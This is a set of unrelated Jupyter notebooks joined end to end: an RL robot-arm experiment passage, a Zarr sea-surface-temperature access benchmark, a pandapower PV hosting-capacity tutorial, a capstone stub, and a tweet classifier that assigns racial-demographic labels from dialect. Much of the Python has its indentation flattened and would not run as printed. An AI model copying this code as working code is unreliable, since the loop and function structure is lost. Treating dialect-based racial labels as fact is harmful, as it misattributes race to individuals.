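# `ParameterGrid` expands the dictionary into every combination of its value lists. A standard-library sketch of the same expansion (a hypothetical stand-in for the sklearn call), which makes it easy to predict the number of training runs before committing to the search:

```python
import itertools

grid = {
    'polar_coord': [True, False],
    'n_hiddens_list': [[256, 256], [512, 512], [768, 768]],
    'n_opt_iterations': [15, 35, 75],
}

# one dict per combination: 2 * 3 * 3 = 18 training runs
keys = sorted(grid)
combos = [dict(zip(keys, values))
          for values in itertools.product(*(grid[k] for k in keys))]
```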
# +
# It seems wasteful not to checkpoint the models instead of running all of the
# separate numbers of trials, i.e. for [500, 1000] trials, checkpoint at 500
# trials and then continue on to 1000. But this ignores the difference in
# epsilon decay between 500 and 1000 trials: a model checkpointed at 500
# trials would still be taking more random actions than a model designed for
# 500 trials.
best_last_20 = np.inf
t0 = time.time()
for i in range(params.shape[0]):
np.random.seed(42)
torch.manual_seed(42)
print('______________________________________________________________________\n')
print(f'Working on row: {i}')
display(params.iloc[i,:])
Qnet, state_funcs, r_mean_trace, _, loss_trace, epsilon_trace = train(robot,
params.polar_coord[i],
valid_actions,
params.n_hiddens_list[i],
params.n_trials[i],
params.n_steps_per_trial[i],
params.n_opt_iterations[i],
params.final_epsilon[i],
params.gamma[i],
params.learning_rate[i],
params.act_func[i],
random_goal,
device
)
# save traces
r_mean_trace_list[i] = r_mean_trace
loss_trace_list[i] = loss_trace
epsilon_trace_list[i] = epsilon_trace
# get mean of the last 20 average Rs
params.loc[i,'mean_last_20_r'] = np.mean(r_mean_trace[-20:])
# update best score and save Qnet to file
if best_last_20 > params.loc[i,'mean_last_20_r']:
# save Qnet model structure and state
torch.save({'state_dict': Qnet.state_dict()}, 'experiment/best_Qnet_state.pth')
joblib.dump(Qnet.model_to_dict(), 'experiment/best_Qnet_model.joblib')
# update best score
best_last_20 = params.loc[i,'mean_last_20_r']
print(f'\nMean of average R for last 20 trials: {params.mean_last_20_r[i]}')
print(f'Best of average R for last 20 trials: {best_last_20}\n')
t1 = time.time()
# -
print(f'elapsed hours: {(t1-t0)/3600}')
# load dictionary with the model definition for the best Qnet
best_Qnet_model = joblib.load('experiment/best_Qnet_model.joblib')
best_Qnet_model
# +
# build model from definition
best_Qnet = MLP(best_Qnet_model['input_size'],
best_Qnet_model['h_sizes'],
best_Qnet_model['n_out'],
best_Qnet_model['act_func'],
best_Qnet_model['use_layer_norm'])
best_Qnet.model_to_dict()
# +
# load model state from best Qnet
checkpoint = torch.load('experiment/best_Qnet_state.pth')
# load model weights from best Qnet
best_Qnet.load_state_dict(checkpoint['state_dict'])
# +
# save experiment in dictionary
experiment_1 = {'params':params.copy(),
'r_mean_trace_list':r_mean_trace_list.copy(),
'loss_trace_list':loss_trace_list.copy(),
'epsilon_trace_list':epsilon_trace_list.copy(),
'robot':robot,
'best_Qnet_model':best_Qnet.model_to_dict(),
'checkpoint':{'state_dict': best_Qnet.state_dict()}}
# save experiment dictionary to file
joblib.dump(experiment_1, 'experiment/experiment_1.joblib')
# -
# load best_Qnet from file if needed
if False:
experiment_1 = joblib.load('experiment/experiment_1.joblib')
# get model definition
best_Qnet_model = experiment_1['best_Qnet_model']
# build model from definition
best_Qnet = MLP(best_Qnet_model['input_size'],
best_Qnet_model['h_sizes'],
best_Qnet_model['n_out'],
best_Qnet_model['act_func'])
# load model weights from checkpoint
best_Qnet.load_state_dict(experiment_1['checkpoint']['state_dict'])
# +
# Take a look at the parameters from the best model
# sort by mean_last_20_r
best_index = experiment_1['params'].sort_values('mean_last_20_r').head(1).index
print(f'index of best model: {best_index[0]}')
experiment_1['params'].sort_values('mean_last_20_r').head()
# -
# look at the best parameters from the data frame
experiment_1['params'].loc[best_index[0],:]
plot_experiment(experiment_1, best_index[0])
# There is quite a bit of volatility towards the end of training in `Mean R per Trial` and `MSE` for the Qnet. Perhaps some additional training might help. Let's set up a heat map to understand where a new grid search could be directed to improve model performance.
#
# ## Set Up the Data Frame to Visualize the Results in a Heat Map
#
# * `mean_last_20_r` needs to be converted to a numeric value
# * `n_hiddens_list` needs to be converted to a string for grouping
# * Data will be pivoted with `n_opt_iterations` on the columns, `mean_last_20_r` as the values, and the remaining parameter search variables as groups on the rows
# +
# convert mean_last_20_r to numeric for use in pivot table
experiment_1['params'].loc[:,'mean_last_20_r'] = pd.to_numeric(experiment_1['params'].loc[:,'mean_last_20_r'])
# convert n_hiddens_list to string for use in pivot table
nh_string = [str(nh) for nh in experiment_1['params'].loc[:,'n_hiddens_list']]
experiment_1['params']['nh_string'] = nh_string
# -
experiment_1['params'].info()
index_cols = ['polar_coord', 'act_func', 'nh_string', 'n_trials', 'n_steps_per_trial']
pivot_results = experiment_1['params'].pivot_table(values='mean_last_20_r',
index=index_cols,
columns='n_opt_iterations')
pivot_results
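# A minimal, self-contained illustration of the same pivot pattern with toy numbers (not the experiment's actual results):

```python
import pandas as pd

toy = pd.DataFrame({
    'polar_coord': [True, True, False, False],
    'n_opt_iterations': [15, 35, 15, 35],
    'mean_last_20_r': [1.2, 0.9, 1.8, 1.5],
})

# rows group by polar_coord, columns spread over n_opt_iterations
toy_pivot = toy.pivot_table(values='mean_last_20_r',
                            index='polar_coord',
                            columns='n_opt_iterations')
```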
sns.heatmap(pivot_results);
# **Thoughts on Heat Map:**
# * The models that included polar coordinates in the state space performed better.
# * The additional complexity of the [768, 768] model did not provide any benefit to learning.
# * Additional optimization steps may have improved the results of the [256,256] model which provided results that were pretty close to the [512,512] model.
# * Repeating the experiment with more steps per trial and more optimization steps might yield further model improvements.
# ## Examine the Animation to See How Well the Model Learned
# +
robot = experiment_1['robot']
# get state_funcs based on boolean value of polar_coord
state_funcs = get_state_functions(experiment_1['params'].loc[best_index[0],'polar_coord'])
for i in range(5):
if random_goal:
robot.set_rand_goal()
initial_state(robot)
robot.animate(50, best_Qnet, state_funcs['state_f'])
# +
np.random.seed(4444)
initial_state(robot)
robot.animate(100, best_Qnet, state_funcs['state_f'], show_all_steps=True)
# -
# ## Summary of Experiment
#
# * Adding polar coordinates is helpful but the model complexity and training steps need to be increased so the model can learn how to use the additional information.
#
# * Slower training, i.e. more steps per trial, helped the models with variable goals learn the best actions for the variable goal state spaces.
#
# * Additional testing with activation functions could be worthwhile. I did some testing with ELU, ReLU, and Tanh, and in these tests ELU performed better, but the tests were not exhaustive. Given additional time, tuning the activation functions in the parameter grid would be interesting.
#
# * The ADAM optimizer was used throughout the experiment. A couple of runs were tested using SGD and a couple of learning-rate decay strategies, but ADAM performed better in this limited testing. This is another area where further testing may prove beneficial.
# ## Next Steps
#
# ### Implement Parallel Training
#
# PyTorch has a drop-in replacement for Python's `multiprocessing` package. Further work can be directed toward implementing the training function so it can be run in parallel in order to speed up parameter searching.
#
# https://pytorch.org/docs/master/notes/multiprocessing.html
#
# ### Try Building a RL Model for Robots with More Links and More Actions
#
# The action space could be increased from `[-0.1, 0.0, 0.1]` to something like `[-0.1, -0.05, 0.0, 0.05, 0.1]` in order to give the robot greater precision. The number of links could be increased as well to give the robot greater flexibility. Each of these changes will increase the training complexity and training time. Implementing parallel training would help reduce the training time.
Reinforcement learning for robot arm - pytorch.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: nsidc-cloud
# language: python
# name: nsidc-cloud
# ---
# # End-user generated time series analysis using Zarr data in xarray
#
# This notebook describes the python-based Zarr time series approach as part of the TRT-43 time series technology study. This notebook was adapted from the [Pangeo AGU Ocean Sciences 2020 tutorial](https://github.com/pangeo-gallery/osm2020tutorial) with credits below:
#
# ### Credits: Tutorial development
# Dr. <NAME> - Twitter - Farallon Institute
#
# <NAME> - Twitter - University of California, Davis
#
# ### Compute Resources
# This notebook was developed and run using an AWS m5.2xlarge instance as this is what was utilized in the Pangeo workshop via their OHW JupyterHub. This has 8 vCPU and 32 GB memory.
# # Dataset used: Multi-Scale Ultra High Resolution (MUR) Sea Surface Temperature (SST)
#
# Found from the AWS Open Registry:
#
# - Click here: [AWS Public Dataset](https://aws.amazon.com/opendata/)
# - Click on `Find public available data on AWS` button
# - Search for MUR
# - Select [MUR SST](https://registry.opendata.aws/mur/)
#
#
#
#
#
#
# -------------------------------------------------------
#
# 
#
#
# ## [MUR SST](https://podaac.jpl.nasa.gov/Multi-scale_Ultra-high_Resolution_MUR-SST) [AWS Public dataset program](https://registry.opendata.aws/mur/)
#
# ### Access the MUR SST Zarr store which is in an s3 bucket.
#
# 
#
# We will start with my favorite Analysis Ready Data (ARD) format: [Zarr](https://zarr.readthedocs.io/en/stable/). Using data stored in Zarr is fast, simple, and contains all the metadata normally in a netcdf file, so you can figure out easily what is in the datastore.
#
# - Fast - Zarr is fast because all the metadata is consolidated into a .json file. Reading in massive datasets is lightning fast because it only reads the metadata and does not read in data until it needs it for a compute.
#
# - Simple - Filenames? Who needs them? Who cares? Not I. Simply point your read routine to the data directory.
#
# - Metadata - all you want!
# ## Import Libraries
#
# You may need to pip install these libraries depending on your python environment
# +
# pip install xarray
# pip install s3fs
# pip install dask
# +
# filter some warning messages
import warnings
warnings.filterwarnings("ignore")
#libraries
import datetime as dt
import xarray as xr
import fsspec
import s3fs
from matplotlib import pyplot as plt
import numpy as np
import pandas as pd
import time
from statistics import mean
from statistics import stdev
# make datasets display nicely
xr.set_options(display_style="html")
import dask
from dask.distributed import performance_report, Client, progress
#magic fncts #put static images of your plot embedded in the notebook
# %matplotlib inline
plt.rcParams['figure.figsize'] = 12, 6
# %config InlineBackend.figure_format = 'retina'
# -
#
# [fsspec.get_mapper](https://filesystem-spec.readthedocs.io/en/latest/api.html?highlight=get_mapper#fsspec.get_mapper) Creates a mapping between your computer and the s3 bucket. This isn't necessary if the Zarr file is stored locally.
#
# [xr.open_zarr](http://xarray.pydata.org/en/stable/generated/xarray.open_zarr.html) Reads a Zarr store into an Xarray dataset
#
# ## Open zarr dataset
#
# Commented out, as this is added as the first step of each test
# +
# # %%time
# file_location = 's3://mur-sst/zarr'
# ikey = fsspec.get_mapper(file_location, anon=True)
# ds_sst = xr.open_zarr(ikey,consolidated=True)
# ds_sst
# -
# ## Testing scenarios
#
# Based on https://wiki.earthdata.nasa.gov/display/TRT/Test+Scenarios
#
# Spatial constraints:
#
# | Spatial extent | Requested bounding box | DAP constraint expression | Grid-cell bounding box |
# | --- | --- | --- | --- |
# | Single grid cell | (-129.995, 39.995, -129.995, 39.995) | `/analysed_sst[][5000][5000];/time;/lat[5000];/lon[5000]` | (-129.95, 39.95, -129.95, 39.95) |
# | 10x10 grid cells | (-129.995, 39.995, -129.905, 39.905) | `/analysed_sst[][5000:5009][5000:5009];/time;/lat[5000:5009];/lon[5000:5009]` | (-129.95, 39.95, -129.86, 39.86) |
# | 3x3 grid cells | (-129.995, 39.995, -129.975, 39.975) | `/analysed_sst[][5000:5002][5000:5002];/time;/lat[5000:5002];/lon[5000:5002]` | (-129.95, 39.95, -129.93, 39.93) |
#
# Temporal constraints:
#
# | Time slices | Temporal range(s) |
# | --- | --- |
# | 100 | 2003-01-01/2003-04-10, 2000-06-01/2000-06-03 |
# | 1000 | 2003-01-01/2005-09-27, 2000-06-01/2000-06-21 |
# | 7014 | 2002-05-31/2021-08-12 |
# | 100000 | 2000-06-01/2006-02-13 |
# | 366625 | 2000-06-01/2021-04-30 |
# | 1,000,000 | |
# ### Test 1:
# Single Grid Cell; 100 time slices
# +
times = []
for i in range(10):
t0 = time.time()
file_location = 's3://mur-sst/zarr'
ikey = fsspec.get_mapper(file_location, anon=True)
ds_sst = xr.open_zarr(ikey,consolidated=True)
sst_timeseries = ds_sst['analysed_sst'].sel(time = slice('2003-01-01','2003-04-10'),
lat = 40,
lon = -130
).load()
wall_time = time.time() - t0
times.append(wall_time)
print (wall_time, "seconds wall time")
ds_sst
print("mean wall time:", mean(times), "stdev wall time:", stdev(times))
# -
sst_timeseries
sst_timeseries.plot()
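# Each test below repeats the same open/subset/`.load()` pattern ten times. That boilerplate could be factored into a small helper; a sketch with a trivial workload standing in for the Zarr subset load:

```python
import time
from statistics import mean, stdev

def benchmark(run, repeats=10):
    # Call run() `repeats` times and report the mean and stdev of per-call wall time
    times = []
    for _ in range(repeats):
        t0 = time.time()
        run()
        times.append(time.time() - t0)
    return mean(times), stdev(times)

# Dummy workload; the real callable would open the Zarr store and load the subset
m, s = benchmark(lambda: sum(range(10_000)), repeats=5)
```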
# ### Test 2:
# Single Grid Cell; 1000 time slices
# +
times = []
for i in range(10):
t0 = time.time()
file_location = 's3://mur-sst/zarr'
ikey = fsspec.get_mapper(file_location, anon=True)
ds_sst = xr.open_zarr(ikey,consolidated=True)
sst_timeseries = ds_sst['analysed_sst'].sel(time = slice('2003-01-01','2005-09-26'),
lat = 40,
lon = -130
).load()
wall_time = time.time() - t0
times.append(wall_time)
print (wall_time, "seconds wall time")
ds_sst
print("mean wall time:", mean(times), "stdev wall time:", stdev(times))
# -
sst_timeseries
sst_timeseries.plot()
# ### Test 3:
# Single Grid Cell; 6443 time slices
#
# **Note that the temporal extent of the Zarr store is 2002-06-01 to 2020-01-20. This results in only 6443 time steps even though our testing constraints are set at 7014 for the entire temporal range of the native collection.**
# +
times = []
for i in range(10):
t0 = time.time()
file_location = 's3://mur-sst/zarr'
ikey = fsspec.get_mapper(file_location, anon=True)
ds_sst = xr.open_zarr(ikey,consolidated=True)
sst_timeseries = ds_sst['analysed_sst'].sel(time = slice('2002-05-31','2021-08-12'),
lat = 40,
lon = -130
).load()
wall_time = time.time() - t0
times.append(wall_time)
print (wall_time, "seconds wall time")
ds_sst
print("mean wall time:", mean(times), "stdev wall time:", stdev(times))
# -
sst_timeseries
sst_timeseries.plot()
# ### Test 4:
# 3x3 grid cells; 100 time slices
# +
times = []
for i in range(10):
t0 = time.time()
file_location = 's3://mur-sst/zarr'
ikey = fsspec.get_mapper(file_location, anon=True)
ds_sst = xr.open_zarr(ikey,consolidated=True)
sst_timeseries = ds_sst['analysed_sst'].sel(time = slice('2003-01-01','2003-04-10'),
lat = slice(39.975,40),
lon = slice(-130,-129.974)
).load()
wall_time = time.time() - t0
times.append(wall_time)
print (wall_time, "seconds wall time")
ds_sst
print("mean wall time:", mean(times), "stdev wall time:", stdev(times))
# -
sst_timeseries
sst_timeseries.plot()
# ### Test 5:
# 3x3 grid cells; 1000 time slices
# +
times = []
for i in range(10):
t0 = time.time()
file_location = 's3://mur-sst/zarr'
ikey = fsspec.get_mapper(file_location, anon=True)
ds_sst = xr.open_zarr(ikey,consolidated=True)
sst_timeseries = ds_sst['analysed_sst'].sel(time = slice('2003-01-01','2005-09-26'),
lat = slice(39.975,40),
lon = slice(-130,-129.974)
).load()
wall_time = time.time() - t0
times.append(wall_time)
print (wall_time, "seconds wall time")
ds_sst
print("mean wall time:", mean(times), "stdev wall time:", stdev(times))
# -
sst_timeseries
sst_timeseries.plot()
# ### Test 6:
# 3x3 grid cells; 6443 time slices
#
# **Note that the temporal extent of the Zarr store is 2002-06-01 to 2020-01-20. This results in only 6443 time steps even though our testing constraints are set at 7014 for the entire temporal range of the native collection.**
# +
times = []
for i in range(10):
t0 = time.time()
file_location = 's3://mur-sst/zarr'
ikey = fsspec.get_mapper(file_location, anon=True)
ds_sst = xr.open_zarr(ikey,consolidated=True)
sst_timeseries = ds_sst['analysed_sst'].sel(time = slice('2002-05-31','2021-08-12'),
lat = slice(39.975,40),
lon = slice(-130,-129.974)
).load()
wall_time = time.time() - t0
times.append(wall_time)
print (wall_time, "seconds wall time")
ds_sst
print("mean wall time:", mean(times), "stdev wall time:", stdev(times))
# -
sst_timeseries
sst_timeseries.plot()
# ### Test 7:
# 10x10 grid cells; 100 time slices
# +
times = []
for i in range(10):
t0 = time.time()
file_location = 's3://mur-sst/zarr'
ikey = fsspec.get_mapper(file_location, anon=True)
ds_sst = xr.open_zarr(ikey,consolidated=True)
sst_timeseries = ds_sst['analysed_sst'].sel(time = slice('2003-01-01','2003-04-10'),
lat = slice(39.905,40),
lon = slice(-130,-129.91)
).load()
wall_time = time.time() - t0
times.append(wall_time)
print (wall_time, "seconds wall time")
ds_sst
print("mean wall time:", mean(times), "stdev wall time:", stdev(times))
# -
sst_timeseries
sst_timeseries.plot()
# ### Test 8:
# 10x10 grid cells; 1000 time slices
# +
times = []
for i in range(10):
t0 = time.time()
file_location = 's3://mur-sst/zarr'
ikey = fsspec.get_mapper(file_location, anon=True)
ds_sst = xr.open_zarr(ikey,consolidated=True)
sst_timeseries = ds_sst['analysed_sst'].sel(time = slice('2003-01-01','2005-09-26'),
lat = slice(39.905,40),
lon = slice(-130,-129.91)
).load()
wall_time = time.time() - t0
times.append(wall_time)
print (wall_time, "seconds wall time")
ds_sst
print("mean wall time:", mean(times), "stdev wall time:", stdev(times))
# -
sst_timeseries
sst_timeseries.plot()
# ### Test 9:
# 10x10 grid cells; 6443 time slices
#
# **Note that the temporal extent of the Zarr store is 2002-06-01 to 2020-01-20. This results in only 6443 time steps even though our testing constraints are set at 7014 for the entire temporal range of the native collection.**
# +
times = []
for i in range(10):
t0 = time.time()
file_location = 's3://mur-sst/zarr'
ikey = fsspec.get_mapper(file_location, anon=True)
ds_sst = xr.open_zarr(ikey,consolidated=True)
sst_timeseries = ds_sst['analysed_sst'].sel(time = slice('2002-05-31','2021-08-12'),
lat = slice(39.905,40),
lon = slice(-130,-129.91)
).load()
wall_time = time.time() - t0
times.append(wall_time)
print (wall_time, "seconds wall time")
ds_sst
print("mean wall time:", mean(times), "stdev wall time:", stdev(times))
# -
sst_timeseries
sst_timeseries.plot()
# # The rest of this notebook is a copy from the Pangeo notebook referenced above.
# ### Read entire 10 years of data at 1 point.
#
# Select the ``analysed_sst`` variable over a specific time period, `lat`, and `lon` and load the data into memory. This is small enough to load into memory which will make calculating climatologies easier in the next step.
# +
# # %%time
# sst_timeseries = ds_sst['analysed_sst'].sel(time = slice('2010-01-01','2020-01-01'),
# lat = 47,
# lon = -145
# ).load()
# sst_timeseries.plot()
# -
# ### The anomaly is more interesting...
#
# Use [.groupby](http://xarray.pydata.org/en/stable/generated/xarray.DataArray.groupby.html#xarray-dataarray-groupby) method to calculate the climatology and [.resample](http://xarray.pydata.org/en/stable/generated/xarray.Dataset.resample.html#xarray-dataset-resample) method to then average it into 1-month bins.
# - [DataArray.mean](http://xarray.pydata.org/en/stable/generated/xarray.DataArray.mean.html#xarray-dataarray-mean) arguments are important! Xarray uses metadata to plot, so keep_attrs is a nice feature. Also, for SST there are regions with changing sea ice. Setting skipna = False removes these regions.
# +
# # %%time
# sst_climatology = sst_timeseries.groupby('time.dayofyear').mean('time',keep_attrs=True,skipna=False)
# sst_anomaly = sst_timeseries.groupby('time.dayofyear')-sst_climatology
# sst_anomaly_monthly = sst_anomaly.resample(time='1MS').mean(keep_attrs=True,skipna=False)
# #plot the data
# sst_anomaly.plot()
# sst_anomaly_monthly.plot()
# plt.axhline(linewidth=2,color='k')
# -
# # Chukchi Sea SST timeseries
#
# # Note SST is set to -1.8 C (271.35 K) when ice is present
# +
# sst_timeseries = ds_sst['analysed_sst'].sel(time = slice('2010-01-01','2020-01-01'),
# lat = 72,
# lon = -171
# ).load()
# sst_timeseries.plot()
# -
# # Grid resolution does NOT equal spatial resolution
#
# - many L4 SST analyses blend infrared (~ 1 - 4 km data) with passive microwave (~ 50 km) data. Data availability will determine regional / temporal changes in spatial resolution
#
# - many L4 SST analyses apply smoothing filters that may further reduce resolution
# +
# # %%time
# subset = ds_sst['analysed_sst'].sel(time='2019-06-01',lat=slice(35,40),lon=slice(-126,-120))
# subset.plot(vmin=282,vmax=289,cmap='inferno')
# +
# # %%time
# subset = ds_sst['analysed_sst'].sel(time='2019-05-15',lat=slice(35,40),lon=slice(-126,-120))
# subset.plot(vmin=282,vmax=289,cmap='inferno')
# -
|
AWS-notebooks/zarr-time-series-analysis.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Hosting Capacity
#
# The term PV hosting capacity is defined as the maximum PV capacity which can be connected to a specific grid, while still complying with relevant grid codes and grid planning principles.
#
# Here we will introduce a basic algorithm to calculate PV hosting capacity with pandapower.
#
# The basic idea of calculating hosting capacity is to increase PV installation until a violation of any planning principle or constraint occurs. To analyse hosting capacity, we need three basic building blocks:
# 1. Evaluating constraint violations
# 2. Choosing connection points for new PV plants
# 3. Defining the installed power of new PV plants
# ### Evaluation of constraint violations
#
# Our example function that evaluates constraint violation is defined as:
# +
import pandapower as pp
def violations(net):
pp.runpp(net)
if net.res_line.loading_percent.max() > 50:
return (True, "Line \n Overloading")
elif net.res_trafo.loading_percent.max() > 50:
return (True, "Transformer \n Overloading")
elif net.res_bus.vm_pu.max() > 1.04:
return (True, "Voltage \n Violation")
else:
return (False, None)
# -
# The function runs a power flow and then checks for line loading and transformer loading (both of which have to be below 50%) and for voltage rise (which has to be below 1.04 pu). The function returns a boolean flag to signal if any constraint is violated as well as a string that indicates the type of constraint violation.
# ### Choosing a connection bus
#
# If new PV plants are installed, a connection bus has to be chosen. Here, we choose one bus at random from the buses that have a load connected:
# +
from numpy.random import choice
def chose_bus(net):
return choice(net.load.bus.values)
# -
# ### Choosing a PV plant size
#
# The function that returns a plant size is given as:
# +
from numpy.random import normal
def get_plant_size_mw():
return normal(loc=0.5, scale=0.05)
# -
# This function returns a random value from a normal distribution with a mean of 0.5 MW and a standard deviation of 0.05 MW. Depending on the existing information, it would also be possible to use other probability distributions, such as a Weibull distribution, or to draw values from existing plant sizes.
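# For example, the standard library's `random.weibullvariate` could replace the normal draw; the scale and shape below are illustrative, not fitted to real plant data:

```python
import random

random.seed(0)  # reproducible draws for this sketch

def get_plant_size_mw_weibull(scale=0.55, shape=2.0):
    # Draw a plant size from a Weibull distribution (illustrative parameters)
    return random.weibullvariate(scale, shape)

sizes = [get_plant_size_mw_weibull() for _ in range(1000)]
```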
# ### Evaluating Hosting Capacity
#
# We now use these building blocks to evaluate hosting capacity in a generic network. We use the MV Oberrhein network from the pandapower networks package as an example:
import pandapower.networks as nw
def load_network():
return nw.mv_oberrhein(scenario="generation")
# The hosting capacity is then evaluated like this:
# +
import pandas as pd
iterations = 50
results = pd.DataFrame(columns=["installed", "violation"])
for i in range(iterations):
net = load_network()
installed_mw = 0
    while True:
violated, violation_type = violations(net)
if violated:
results.loc[i] = [installed_mw, violation_type]
break
else:
plant_size = get_plant_size_mw()
pp.create_sgen(net, chose_bus(net), p_mw=plant_size, q_mvar=0)
installed_mw += plant_size
# -
# This algorithm adds new PV plants until a violation of any constraint occurs, and then saves the installed PV capacity. This is carried out for a number of iterations (here: 50) to get a distribution of hosting capacity values depending on connection points and plant sizes.
#
# The results can be visualized using matplotlib and seaborn:
# +
import matplotlib.pyplot as plt
# %matplotlib inline
plt.rc('xtick', labelsize=18)   # fontsize of the x tick labels
plt.rc('ytick', labelsize=18)   # fontsize of the y tick labels
plt.rc('legend', fontsize=18)   # fontsize of the legend
plt.rc('axes', labelsize=20)    # fontsize of the axis labels
plt.rcParams['font.size'] = 20
import seaborn as sns
sns.set_style("whitegrid", {'axes.grid' : False})
fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(10,5))
ax = axes[0]
sns.boxplot(results.installed, width=.1, ax=ax, orient="v")
ax.set_xticklabels([""])
ax.set_ylabel("Installed Capacity [MW]")
ax = axes[1]
ax.axis("equal")
results.violation.value_counts().plot(kind="pie", ax=ax, autopct=lambda x:"%.0f %%"%x)
ax.set_ylabel("")
ax.set_xlabel("")
sns.despine()
plt.tight_layout()
# -
# Note that this is only an example of a basic algorithm to demonstrate how such problems can be tackled with pandapower. Algorithms applied in real case studies might include Q-control of PV plants, transformer tap controllers, a more sophisticated distribution of PV plants, different probability distributions for different buses, a binary search for the hosting capacity evaluation, etc.
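# The binary-search idea for hosting capacity can be sketched independently of the grid model; `feasible` is a hypothetical stand-in for "a network with `mw` of installed PV violates no constraint":

```python
def hosting_capacity_bisect(feasible, lo=0.0, hi=100.0, tol=0.01):
    # Largest installed power in [lo, hi] (MW) for which feasible(mw) still holds
    while hi - lo > tol:
        mid = (lo + hi) / 2
        if feasible(mid):
            lo = mid
        else:
            hi = mid
    return lo

# Mock feasibility: constraints hold below 12.3 MW
cap = hosting_capacity_bisect(lambda mw: mw < 12.3)
```

# Unlike the random-placement loop above, this needs far fewer power flow runs, but it assumes a fixed placement of the plants.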
|
tutorials/hosting_capacity.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Hello Capstone Project Course!
# ### This is my week-1 assignment
# #### The 'Data-Collisions.csv' is the dataset shared in the Applied Data Science Capstone - IBM
import pandas as pd
import numpy as np
df = pd.read_csv('Data-Collisions.csv')
df.head() #5 first rows in the df
print('The df dataframe has:\n'
'—', df.size, 'elements;\n'
'—', df.shape[0], 'differents rows;\n'
'And', df.shape[1], 'differents columns.')
df.info() #info in this df, with the column, non-null count and dtype (and others)
# ## The Project - Bicycles involved in the collision
# #### The project will deal with accidents involving cyclists, which in this dataframe are recorded in the PEDCYLCOUNT column. All necessary data will later be specified to build a machine learning algorithm that establishes relationships and demonstrates (perhaps) the conditions under which a cyclist should remain more alert, or even refrain from using the bicycle, due to a high level of insecurity caused by factors such as the weather.
|
Peer-graded_Assignment_Setting_up_Github_Account_for_The_Project.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
#
# # Race classification
#
# <NAME> and <NAME> initially wrote this notebook. <NAME> reviewed the notebook, edited the markdown, and commented on the code.
#
# Racial demographic dialect predictions were made by the model developed by [<NAME>., <NAME>., & <NAME>. (2016)](https://arxiv.org/pdf/1608.08868.pdf). We modified their predict function in [the public Git repository](https://github.com/slanglab/twitteraae) to work in the notebook environment.
# +
# Import libraries
import pandas as pd
import numpy as np
import re
import seaborn as sns
import matplotlib.pyplot as plt
## Language-demography model
import predict
# -
# ### Import Tweets
# +
# Import file
tweets = pd.read_csv("tweet.csv").drop(['Unnamed: 0'], axis=1)
# Index variable
tweets.index.name = 'ID'
# First five rows
tweets.head()
# -
# ### Clean Tweets
# +
# HTML tags and punctuation
url_re = r'http\S+'
at_re = r'@[\w]*'
rt_re = r'^[rt]{2}'
punct_re = r'[^\w\s]'
tweets_clean = tweets.copy()
tweets_clean['Tweet'] = tweets_clean['Tweet'].str.lower() # Lower Case
tweets_clean['Tweet'] = tweets_clean['Tweet'].str.replace(url_re, '') # Remove Links/URL
tweets_clean['Tweet'] = tweets_clean['Tweet'].str.replace(at_re, '') # Remove @
tweets_clean['Tweet'] = tweets_clean['Tweet'].str.replace(rt_re, '') # Remove rt
tweets_clean['Tweet'] = tweets_clean['Tweet'].str.replace(punct_re, '') # Remove Punctation
tweets_clean['Tweet'] = tweets_clean['Tweet'].apply(unicode) # Python 2 unicode for model compatibility; use str on Python 3
tweets_clean.head()
# -
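# The same cleaning steps can be checked on a single string with the standard `re` module, using the patterns defined above:

```python
import re

def clean_tweet(text):
    text = text.lower()
    text = re.sub(r'http\S+', '', text)   # links
    text = re.sub(r'@[\w]*', '', text)    # mentions
    text = re.sub(r'^[rt]{2}', '', text)  # leading "rt"
    text = re.sub(r'[^\w\s]', '', text)   # punctuation
    return text.strip()

cleaned = clean_tweet("RT @user: Check https://t.co/abc out!")  # -> "check  out"
```

# Note that `^[rt]{2}` also strips any tweet-initial "rr", "tr", or "tt"; anchoring on `^rt\b` would be stricter.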
# ### Apply Predictions
# +
predict.load_model()
def prediction(string):
return predict.predict(string.split())
predictions = tweets_clean['Tweet'].apply(prediction)
# +
tweets_clean['Predictions'] = predictions
# Fill tweets that have no predictions with None
tweets_clean = tweets_clean.fillna("NA")
tweets_clean.head()
# +
def first_last(item):
    if item == 'NA':  # "is" compares identity, not equality
        return 'NA'
    return np.array([item[0], item[3]])
# Add "Predictions_AAE_WAE" column which is predictions for AAE dialect and WAE dialect
tweets_clean['Predictions_AAE_W'] = tweets_clean['Predictions'].apply(first_last)
tweets_clean.head()
# +
# Model 1
def detect_two(item):
if item is 'NA':
return None
if item[0] >= item[1]:
return 0
else:
return 1
# Model 2
def detect_all(item):
    if item == "NA":
return None
if item[0] >= item[1] and item[0] >= item[2] and item[0] >= item[3]:
return 0
elif item[3] >= item[0] and item[3] >= item[1] and item[3] >= item[2]:
return 1
else:
return 2
# Add "Racial Demographic" column such that AAE is represented by 0 and WAE is represented by 1
tweets_clean['Racial Demographic (Two)'] = tweets_clean['Predictions_AAE_W'].apply(detect_two)
tweets_clean['Racial Demographic (All)'] = tweets_clean['Predictions'].apply(detect_all)
# -
# ### Tweets with Predictions Based on Racial Demographics (AAE, WAE)
final_tweets = tweets_clean.drop(columns=["Predictions", "Predictions_AAE_W"])
final_tweets['Tweet'] = tweets['Tweet']
final_tweets.head()
# ### Export Tweets to CSV
final_tweets.to_csv('r_d_tweets_3.csv')
# ## Analysis
sns.countplot(x=final_tweets['Racial Demographic (Two)'])
plt.title("Racial Demographic (Two)")
sns.countplot(x=final_tweets['Racial Demographic (All)'])
plt.title("Racial Demographic (All)")
aae = final_tweets[final_tweets['Racial Demographic (All)'] == 0]
aae.head()
counts = aae.groupby("Type").count()
counts = counts.reset_index().rename(columns = {'Number of Votes': 'Count'})
counts
sns.barplot(x="Type", y="Count", data = counts)
plt.title("Type Counts AAE")
wae = final_tweets[final_tweets['Racial Demographic (All)'] == 1]
wae.head()
counts_wae = wae.groupby("Type").count()
